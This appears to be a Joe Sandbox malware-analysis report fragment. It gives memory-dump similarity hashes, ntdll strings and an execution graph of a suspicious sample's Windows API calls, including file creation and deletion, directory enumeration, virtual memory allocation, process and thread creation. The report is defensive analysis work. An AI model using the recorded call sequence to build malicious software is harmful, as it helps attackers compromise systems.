                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fea4275582fe4d8b4f0d520515676088bbdc6378d9011ceaa3515df3284747d9
                                                                                  • Instruction ID: 8c2f5a8ca549c3a5f007b8f2c209657fbef13e2249c8f1d085bcdcf6a74693a6
                                                                                  • Opcode Fuzzy Hash: fea4275582fe4d8b4f0d520515676088bbdc6378d9011ceaa3515df3284747d9
                                                                                  • Instruction Fuzzy Hash: 17900222211C0042D60475685C54B070015C7E1303F95C125A0158564CC91589616537
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bf9510cd135ae373986bf2056ed3fb94fb0c4f9437083b6d52ef6bb40424c1e3
                                                                                  • Instruction ID: 1c7bcb0afebc9503ebc457cc3ce6bff6c995d6b400394eccf9b67d035adb676c
                                                                                  • Opcode Fuzzy Hash: bf9510cd135ae373986bf2056ed3fb94fb0c4f9437083b6d52ef6bb40424c1e3
                                                                                  • Instruction Fuzzy Hash: 84900222601400424544716898849064015EBF2211795C131A099C560D85598965667B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ebc1fcb7fb34777677537a1adba1e8b9375e5145afacd184a375eb014b237af1
                                                                                  • Instruction ID: be0d4569aea0f76efe077bc7f72fdea74729e979e085aa9ec82e65fbe45f5bc4
                                                                                  • Opcode Fuzzy Hash: ebc1fcb7fb34777677537a1adba1e8b9375e5145afacd184a375eb014b237af1
                                                                                  • Instruction Fuzzy Hash: 4190023220180402D504715858487470015C7E1302F95C021A5168565E8665C9917537
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fcee81dc4e02bd0d2f9d201c2e96ba96b89ebfb8d50ff54c007e1a12dc4cca1d
                                                                                  • Instruction ID: 263061807b27e350fb149eaced9254e9456557cee47f8f3a9c6a8a43e7e31b77
                                                                                  • Opcode Fuzzy Hash: fcee81dc4e02bd0d2f9d201c2e96ba96b89ebfb8d50ff54c007e1a12dc4cca1d
                                                                                  • Instruction Fuzzy Hash: 1390023220180402D5047158585470B0015C7E1302F95C021A1168565D862589517577
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7374b3871f45a7ff75b9f6dca622558df78218fe26f6355093881e58f4eb7415
                                                                                  • Instruction ID: 6fba392310fe3c6e2db52e38f51835f24d7957632b5ffacbcc3e5414a4ed80f9
                                                                                  • Opcode Fuzzy Hash: 7374b3871f45a7ff75b9f6dca622558df78218fe26f6355093881e58f4eb7415
                                                                                  • Instruction Fuzzy Hash: 0790022230140402D506715854546060019C7E2345FD5C022E1428565D86258A53B137
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6590539cc6822b6fe2bfacb7dd09ef3ebe103446a0bbc0cb3bb83d12d8bcfc4e
                                                                                  • Instruction ID: b03fba320e611419de3062142d1cac5b76cc7d86448b28b9091d3e07b5b6ad9c
                                                                                  • Opcode Fuzzy Hash: 6590539cc6822b6fe2bfacb7dd09ef3ebe103446a0bbc0cb3bb83d12d8bcfc4e
                                                                                  • Instruction Fuzzy Hash: 3C90026220180403D544755858446070015C7E1302F95C021A2068565E8A298D51713B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 65a4be611523d5484a16c94ba70337d55db36056e3190c0deca18f00d6f762c4
                                                                                  • Instruction ID: 7acfe4870ed5f4e1c0ac0f5fbfeaa3779b36f5d6a20f5d524c60d71a9f719b6c
                                                                                  • Opcode Fuzzy Hash: 65a4be611523d5484a16c94ba70337d55db36056e3190c0deca18f00d6f762c4
                                                                                  • Instruction Fuzzy Hash: 6B90027220140402D544715854447460015C7E1301F95C021A5068564E86598ED5767B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 45b654d9072a6b7bd421f9755becebcc867c5f493ac3128df528a1d41ad61f65
                                                                                  • Instruction ID: efdb84e73ea6910645800ddf76d5267e660f9ce28ed7b4caee01ac9a3ef4228c
                                                                                  • Opcode Fuzzy Hash: 45b654d9072a6b7bd421f9755becebcc867c5f493ac3128df528a1d41ad61f65
                                                                                  • Instruction Fuzzy Hash: 9690022260140502D50571585444616001AC7E1241FD5C032A1028565ECA258A92B137
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e2c5b2d05bb90f620300953f76bde7e11ed9c5b2e40b45ab391ed993495874ec
                                                                                  • Instruction ID: 5aad2c7b641d81037b636d204e6e8f38925d4db5ff3542212df7b157046ca624
                                                                                  • Opcode Fuzzy Hash: e2c5b2d05bb90f620300953f76bde7e11ed9c5b2e40b45ab391ed993495874ec
                                                                                  • Instruction Fuzzy Hash: BF90023220140802D5847158544464A0015C7E2301FD5C025A0029664DCA158B5977B7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ad56cf2d1679a2a16bed6bad67019b80164eaee5a26a60df0b718668b36c84ee
                                                                                  • Instruction ID: 4aa5d11ff8ccac7b8942eb20be67a525a3d6febc3442acbd72bab0c81ac5e11d
                                                                                  • Opcode Fuzzy Hash: ad56cf2d1679a2a16bed6bad67019b80164eaee5a26a60df0b718668b36c84ee
                                                                                  • Instruction Fuzzy Hash: A090023220544842D54471585444A460025C7E1305F95C021A00686A4D96258E55B677
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 26e4ee425636cf4fa8c9e33cb37f91cdd33adcf79927b0c083546e5c2073c9e1
                                                                                  • Instruction ID: 870f0980361d0918f2c5142ca6eaa472bf7c1e783bcd68a05a8ed61f64b86cf0
                                                                                  • Opcode Fuzzy Hash: 26e4ee425636cf4fa8c9e33cb37f91cdd33adcf79927b0c083546e5c2073c9e1
                                                                                  • Instruction Fuzzy Hash: F490023260540802D554715854547460015C7E1301F95C021A0028664D87558B5576B7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  Strings
                                                                                  • Execute=1, xrefs: 057B4713
                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 057B4742
                                                                                  • ExecuteOptions, xrefs: 057B46A0
                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 057B4725
                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 057B4655
                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 057B46FC
                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 057B4787
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                  • API String ID: 0-484625025
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-$0$0
                                                                                  • API String ID: 1302938615-699404926
                                                                                  Strings
                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 057B02BD
                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 057B02E7
                                                                                  • RTL: Re-Waiting, xrefs: 057B031E
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                  • API String ID: 0-2474120054
                                                                                  Strings
                                                                                  • RTL: Resource at %p, xrefs: 057B7B8E
                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 057B7B7F
                                                                                  • RTL: Re-Waiting, xrefs: 057B7BAC
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 0-871070163
                                                                                  APIs
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 057B728C
                                                                                  Strings
                                                                                  • RTL: Resource at %p, xrefs: 057B72A3
                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 057B7294
                                                                                  • RTL: Re-Waiting, xrefs: 057B72C1
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 885266447-605551621
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$]:%u
                                                                                  • API String ID: 48624451-3050659472
                                                                                  APIs
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-
                                                                                  • API String ID: 1302938615-2137968064
                                                                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                  • Instruction ID: c6c8ae0bfd229dd89def28abae5e8dbe3bbc20cd079e763ccfa89a144aee56fe
                                                                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                  • Instruction Fuzzy Hash: 9991D9B0E842159BDF2CEE69C881ABEB7A6FF44320F744519E857E72C0D7318942E720
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $$@
                                                                                  • API String ID: 0-1194432280
                                                                                  • Opcode ID: 4ea78f5c7b0a745c25510d1f0fdb89ef4f6ab6eec82b9a9d7fc3a39dfaa37c60
                                                                                  • Instruction ID: 9bfdcc24ea19614ee8e2f8ec231690ee0fa1df3623912d40d9d5a3e8ee93223b
                                                                                  • Opcode Fuzzy Hash: 4ea78f5c7b0a745c25510d1f0fdb89ef4f6ab6eec82b9a9d7fc3a39dfaa37c60
                                                                                  • Instruction Fuzzy Hash: A1812C76D042699BDB25DF54CC49BEEB7B4BB48710F0042EAEA19B7640E7705E80DFA0

                                                                                  Execution Graph

                                                                                  Execution Coverage: 2.9%
                                                                                  Dynamic/Decrypted Code Coverage: 4.2%
                                                                                  Signature Coverage: 2.2%
                                                                                  Total number of Nodes: 451
                                                                                  Total number of Limit Nodes: 75
                                                                                  execution_graph 84612 409b80 84615 409f04 84612->84615 84614 40a20b 84615->84614 84616 42ae10 84615->84616 84617 42ae33 84616->84617 84622 404110 84617->84622 84619 42ae3f 84620 42ae78 84619->84620 84625 425350 84619->84625 84620->84614 84629 412e80 84622->84629 84624 40411d 84624->84619 84626 4253b2 84625->84626 84628 4253bf 84626->84628 84653 411640 84626->84653 84628->84620 84630 412e9a 84629->84630 84632 412eb3 84630->84632 84633 429b50 84630->84633 84632->84624 84635 429b6a 84633->84635 84634 429b99 84634->84632 84635->84634 84640 428710 84635->84640 84641 42872a 84640->84641 84647 4602c0a 84641->84647 84642 428756 84644 42b1a0 84642->84644 84650 429450 84644->84650 84646 429c12 84646->84632 84648 4602c11 84647->84648 84649 4602c1f LdrInitializeThunk 84647->84649 84648->84642 84649->84642 84651 42946d 84650->84651 84652 42947e RtlFreeHeap 84651->84652 84652->84646 84654 411678 84653->84654 84669 417b20 84654->84669 84656 411680 84667 41194d 84656->84667 84680 42b280 84656->84680 84658 411696 84659 42b280 RtlAllocateHeap 84658->84659 84660 4116a7 84659->84660 84661 42b280 RtlAllocateHeap 84660->84661 84662 4116b8 84661->84662 84668 41174f 84662->84668 84691 4166a0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 84662->84691 84665 411902 84687 427c90 84665->84687 84667->84628 84683 4141c0 84668->84683 84670 417b4c 84669->84670 84692 417a10 84670->84692 84673 417b91 84675 417bad 84673->84675 84678 4290d0 NtClose 84673->84678 84674 417b79 84676 417b84 84674->84676 84698 4290d0 84674->84698 84675->84656 84676->84656 84679 417ba3 84678->84679 84679->84656 84706 429400 84680->84706 84682 42b29b 84682->84658 84684 4141e4 84683->84684 84685 414220 LdrLoadDll 84684->84685 84686 4141eb 84684->84686 84685->84686 84686->84665 84688 427cf1 84687->84688 84690 427cfe 84688->84690 84709 411960 84688->84709 84690->84667 84691->84668 84693 417a2a 84692->84693 84697 417b06 
84692->84697 84701 4287b0 84693->84701 84696 4290d0 NtClose 84696->84697 84697->84673 84697->84674 84699 4290ea 84698->84699 84700 4290fb NtClose 84699->84700 84700->84676 84702 4287ca 84701->84702 84705 46035c0 LdrInitializeThunk 84702->84705 84703 417afa 84703->84696 84705->84703 84707 42941d 84706->84707 84708 42942e RtlAllocateHeap 84707->84708 84708->84682 84725 417df0 84709->84725 84711 411ef6 84711->84690 84712 411980 84712->84711 84729 420e20 84712->84729 84715 411b9f 84737 42c490 84715->84737 84717 4119de 84717->84711 84732 42c360 84717->84732 84719 411bb4 84721 411c07 84719->84721 84743 410490 84719->84743 84721->84711 84723 410490 LdrInitializeThunk 84721->84723 84746 417d90 84721->84746 84722 417d90 LdrInitializeThunk 84724 411d63 84722->84724 84723->84721 84724->84721 84724->84722 84726 417dfd 84725->84726 84727 417e25 84726->84727 84728 417e1e SetErrorMode 84726->84728 84727->84712 84728->84727 84731 420e41 84729->84731 84750 42b110 84729->84750 84731->84717 84733 42c370 84732->84733 84734 42c376 84732->84734 84733->84715 84735 42b280 RtlAllocateHeap 84734->84735 84736 42c39c 84735->84736 84736->84715 84738 42c400 84737->84738 84739 42b280 RtlAllocateHeap 84738->84739 84741 42c45d 84738->84741 84740 42c43a 84739->84740 84742 42b1a0 RtlFreeHeap 84740->84742 84741->84719 84742->84741 84744 4104b2 84743->84744 84757 429370 84743->84757 84744->84724 84747 417da3 84746->84747 84762 428610 84747->84762 84749 417dce 84749->84721 84753 429240 84750->84753 84752 42b141 84752->84731 84754 4292d8 84753->84754 84756 42926e 84753->84756 84755 4292ee NtAllocateVirtualMemory 84754->84755 84755->84752 84756->84752 84758 42938a 84757->84758 84761 4602c70 LdrInitializeThunk 84758->84761 84759 4293b2 84759->84744 84761->84759 84763 42868e 84762->84763 84765 42863b 84762->84765 84767 4602dd0 LdrInitializeThunk 84763->84767 84764 4286b3 84764->84749 84765->84749 84767->84764 84768 41fe00 84769 41fe1d 84768->84769 84770 4141c0 LdrLoadDll 84769->84770 84771 41fe3b 
84770->84771 84772 41f500 84773 41f564 84772->84773 84801 415f40 84773->84801 84775 41f69e 84776 41f697 84776->84775 84808 416050 84776->84808 84778 41f843 84779 41f71a 84779->84778 84780 41f852 84779->84780 84812 41f2e0 84779->84812 84781 4290d0 NtClose 84780->84781 84783 41f85c 84781->84783 84784 41f756 84784->84780 84785 41f761 84784->84785 84786 42b280 RtlAllocateHeap 84785->84786 84787 41f78a 84786->84787 84788 41f793 84787->84788 84789 41f7a9 84787->84789 84790 4290d0 NtClose 84788->84790 84821 41f1d0 CoInitialize 84789->84821 84792 41f79d 84790->84792 84793 41f7b7 84824 428b80 84793->84824 84795 41f832 84796 4290d0 NtClose 84795->84796 84797 41f83c 84796->84797 84798 42b1a0 RtlFreeHeap 84797->84798 84798->84778 84799 41f7d5 84799->84795 84800 428b80 LdrInitializeThunk 84799->84800 84800->84799 84803 415f73 84801->84803 84802 415f97 84802->84776 84803->84802 84828 428c30 84803->84828 84805 415fba 84805->84802 84806 4290d0 NtClose 84805->84806 84807 41603a 84806->84807 84807->84776 84809 416075 84808->84809 84833 428a30 84809->84833 84813 41f2f5 84812->84813 84814 4141c0 LdrLoadDll 84813->84814 84816 41f31a 84814->84816 84815 41f323 84815->84784 84816->84815 84817 4141c0 LdrLoadDll 84816->84817 84818 41f3ee 84817->84818 84819 4141c0 LdrLoadDll 84818->84819 84820 41f44b 84818->84820 84819->84820 84820->84784 84823 41f235 84821->84823 84822 41f2cb CoUninitialize 84822->84793 84823->84822 84825 428b9d 84824->84825 84838 4602ba0 LdrInitializeThunk 84825->84838 84826 428bcd 84826->84799 84829 428c4a 84828->84829 84832 4602ca0 LdrInitializeThunk 84829->84832 84830 428c76 84830->84805 84832->84830 84834 428a4d 84833->84834 84837 4602c60 LdrInitializeThunk 84834->84837 84835 4160e9 84835->84779 84837->84835 84838->84826 84839 4286c0 84840 4286dd 84839->84840 84843 4602df0 LdrInitializeThunk 84840->84843 84841 428705 84843->84841 84844 428540 84845 4285d2 84844->84845 84846 42856e 84844->84846 84849 4602ee0 LdrInitializeThunk 84845->84849 84847 428603 84849->84847 
84850 425dc0 84851 425e1a 84850->84851 84853 425e27 84851->84853 84854 4237c0 84851->84854 84855 42b110 NtAllocateVirtualMemory 84854->84855 84857 423801 84855->84857 84856 42390e 84856->84853 84857->84856 84858 4141c0 LdrLoadDll 84857->84858 84860 423847 84858->84860 84859 423890 Sleep 84859->84860 84860->84856 84860->84859 84861 42c3c0 84862 42b1a0 RtlFreeHeap 84861->84862 84863 42c3d5 84862->84863 84864 40b1d0 84865 42b110 NtAllocateVirtualMemory 84864->84865 84866 40c841 84864->84866 84865->84866 84868 416a10 84869 416a3a 84868->84869 84872 417bc0 84869->84872 84871 416a64 84873 417bdd 84872->84873 84879 428800 84873->84879 84875 417c2d 84876 417c34 84875->84876 84884 4288e0 84875->84884 84876->84871 84878 417c5d 84878->84871 84880 42889e 84879->84880 84882 42882e 84879->84882 84889 4602f30 LdrInitializeThunk 84880->84889 84881 4288d7 84881->84875 84882->84875 84885 428991 84884->84885 84887 42890f 84884->84887 84890 4602d10 LdrInitializeThunk 84885->84890 84886 4289d6 84886->84878 84887->84878 84889->84881 84890->84886 84891 428dd0 84892 428e8a 84891->84892 84894 428e02 84891->84894 84893 428ea0 NtCreateFile 84892->84893 84895 409b20 84897 409b2f 84895->84897 84896 409b70 84897->84896 84898 409b5d CreateThread 84897->84898 84899 417020 84900 416fd1 84899->84900 84901 41704d 84899->84901 84902 417002 84900->84902 84904 41af20 84900->84904 84905 41af46 84904->84905 84906 41b179 84905->84906 84931 4294e0 84905->84931 84906->84902 84908 41afbc 84908->84906 84909 42c490 2 API calls 84908->84909 84910 41afdb 84909->84910 84910->84906 84911 41b0b2 84910->84911 84912 428710 LdrInitializeThunk 84910->84912 84914 4157b0 LdrInitializeThunk 84911->84914 84919 41b0d1 84911->84919 84913 41b03d 84912->84913 84913->84911 84915 41b046 84913->84915 84914->84919 84915->84906 84916 41b09a 84915->84916 84920 41b078 84915->84920 84934 4157b0 84915->84934 84917 417d90 LdrInitializeThunk 84916->84917 84921 41b0a8 84917->84921 84918 41b161 84923 417d90 LdrInitializeThunk 84918->84923 
84919->84918 84938 428280 84919->84938 84953 4244d0 LdrInitializeThunk 84920->84953 84921->84902 84927 41b16f 84923->84927 84926 41b138 84943 428330 84926->84943 84927->84902 84929 41b152 84948 428490 84929->84948 84932 4294fd 84931->84932 84933 42950e CreateProcessInternalW 84932->84933 84933->84908 84935 4157b3 84934->84935 84936 4288e0 LdrInitializeThunk 84935->84936 84937 4157ee 84936->84937 84937->84920 84939 4282fd 84938->84939 84940 4282ab 84938->84940 84954 46039b0 LdrInitializeThunk 84939->84954 84940->84926 84941 428322 84941->84926 84944 4283ad 84943->84944 84946 42835b 84943->84946 84955 4604340 LdrInitializeThunk 84944->84955 84945 4283d2 84945->84929 84946->84929 84949 4284be 84948->84949 84950 428510 84948->84950 84949->84918 84956 4602fb0 LdrInitializeThunk 84950->84956 84951 428535 84951->84918 84953->84916 84954->84941 84955->84945 84956->84951 84957 41c2a0 84958 41c2c9 84957->84958 84959 41c3cd 84958->84959 84960 41c373 FindFirstFileW 84958->84960 84960->84959 84962 41c38e 84960->84962 84961 41c3b4 FindNextFileW 84961->84962 84963 41c3c6 FindClose 84961->84963 84962->84961 84963->84959 84964 421460 84965 42147c 84964->84965 84966 4214a4 84965->84966 84967 4214b8 84965->84967 84968 4290d0 NtClose 84966->84968 84969 4290d0 NtClose 84967->84969 84970 4214ad 84968->84970 84971 4214c1 84969->84971 84974 42b2c0 RtlAllocateHeap 84971->84974 84973 4214cc 84974->84973 84990 420fe1 85002 428f40 84990->85002 84992 421020 84994 4290d0 NtClose 84992->84994 84993 421035 84995 4290d0 NtClose 84993->84995 84997 421029 84994->84997 84999 42103e 84995->84999 84996 421002 84996->84992 84996->84993 84998 421075 84999->84998 85000 42b1a0 RtlFreeHeap 84999->85000 85001 421069 85000->85001 85003 428fe7 85002->85003 85005 428f6b 85002->85005 85004 428ffd NtReadFile 85003->85004 85004->84996 85005->84996 85006 4123e8 85007 415f40 2 API calls 85006->85007 85008 412413 85007->85008 85009 410a6b PostThreadMessageW 85010 410a7d 85009->85010 85011 4602ad0 LdrInitializeThunk 
85012 415830 85013 415860 85012->85013 85014 417d90 LdrInitializeThunk 85012->85014 85016 41588c 85013->85016 85017 417d10 85013->85017 85014->85013 85018 417d54 85017->85018 85023 417d75 85018->85023 85024 4283e0 85018->85024 85020 417d65 85021 417d81 85020->85021 85022 4290d0 NtClose 85020->85022 85021->85013 85022->85023 85023->85013 85025 42845d 85024->85025 85027 42840b 85024->85027 85029 4604650 LdrInitializeThunk 85025->85029 85026 428482 85026->85020 85027->85020 85029->85026 85030 4198b0 85031 4198c6 85030->85031 85032 4198cb 85030->85032 85033 4198fd 85032->85033 85034 42b1a0 RtlFreeHeap 85032->85034 85034->85033 85035 41a9f0 85040 41a700 85035->85040 85037 41a9fd 85054 41a370 85037->85054 85039 41aa19 85041 41a725 85040->85041 85065 418000 85041->85065 85044 41a873 85044->85037 85046 41a88a 85046->85037 85047 41a881 85047->85046 85049 41a977 85047->85049 85084 419dc0 85047->85084 85051 41a9da 85049->85051 85093 41a130 85049->85093 85052 42b1a0 RtlFreeHeap 85051->85052 85053 41a9e1 85052->85053 85053->85037 85055 41a386 85054->85055 85062 41a391 85054->85062 85056 42b280 RtlAllocateHeap 85055->85056 85056->85062 85057 41a3b5 85057->85039 85058 418000 GetFileAttributesW 85058->85062 85059 41a6d2 85060 41a6eb 85059->85060 85061 42b1a0 RtlFreeHeap 85059->85061 85060->85039 85061->85060 85062->85057 85062->85058 85062->85059 85063 419dc0 RtlFreeHeap 85062->85063 85064 41a130 RtlFreeHeap 85062->85064 85063->85062 85064->85062 85066 418021 85065->85066 85067 418028 GetFileAttributesW 85066->85067 85068 418033 85066->85068 85067->85068 85068->85044 85069 423090 85068->85069 85070 42309e 85069->85070 85071 4230a5 85069->85071 85070->85047 85072 4141c0 LdrLoadDll 85071->85072 85073 4230da 85072->85073 85074 4230e9 85073->85074 85097 422b50 LdrLoadDll 85073->85097 85076 42b280 RtlAllocateHeap 85074->85076 85080 423297 85074->85080 85077 423102 85076->85077 85078 42328d 85077->85078 85077->85080 85081 42311e 85077->85081 85079 42b1a0 RtlFreeHeap 85078->85079 
85078->85080 85079->85080 85080->85047 85081->85080 85082 42b1a0 RtlFreeHeap 85081->85082 85083 423281 85082->85083 85083->85047 85085 419de6 85084->85085 85098 41d810 85085->85098 85087 419e58 85089 419fe0 85087->85089 85090 419e76 85087->85090 85088 419fc5 85088->85047 85089->85088 85091 419c80 RtlFreeHeap 85089->85091 85090->85088 85103 419c80 85090->85103 85091->85089 85094 41a156 85093->85094 85095 41d810 RtlFreeHeap 85094->85095 85096 41a1dd 85095->85096 85096->85049 85097->85074 85100 41d834 85098->85100 85099 41d841 85099->85087 85100->85099 85101 42b1a0 RtlFreeHeap 85100->85101 85102 41d884 85101->85102 85102->85087 85104 419c9d 85103->85104 85107 41d8a0 85104->85107 85106 419da3 85106->85090 85108 41d8c4 85107->85108 85109 41d96e 85108->85109 85110 42b1a0 RtlFreeHeap 85108->85110 85109->85106 85110->85109 85111 416db0 85112 416dcc 85111->85112 85115 416e1f 85111->85115 85114 4290d0 NtClose 85112->85114 85112->85115 85113 416f51 85118 416de7 85114->85118 85115->85113 85122 4161d0 NtClose LdrInitializeThunk LdrInitializeThunk 85115->85122 85117 416f2e 85117->85113 85123 4163a0 NtClose LdrInitializeThunk LdrInitializeThunk 85117->85123 85121 4161d0 NtClose LdrInitializeThunk LdrInitializeThunk 85118->85121 85121->85115 85122->85117 85123->85113 85124 429030 85125 4290a7 85124->85125 85127 42905b 85124->85127 85126 4290bd NtDeleteFile 85125->85126 85128 412d73 85129 417a10 2 API calls 85128->85129 85130 412d83 85129->85130 85131 4290d0 NtClose 85130->85131 85132 412d9f 85130->85132 85131->85132 85133 4217f0 85134 421809 85133->85134 85135 421851 85134->85135 85138 421891 85134->85138 85140 421896 85134->85140 85136 42b1a0 RtlFreeHeap 85135->85136 85137 421861 85136->85137 85139 42b1a0 RtlFreeHeap 85138->85139 85139->85140 85141 4184b4 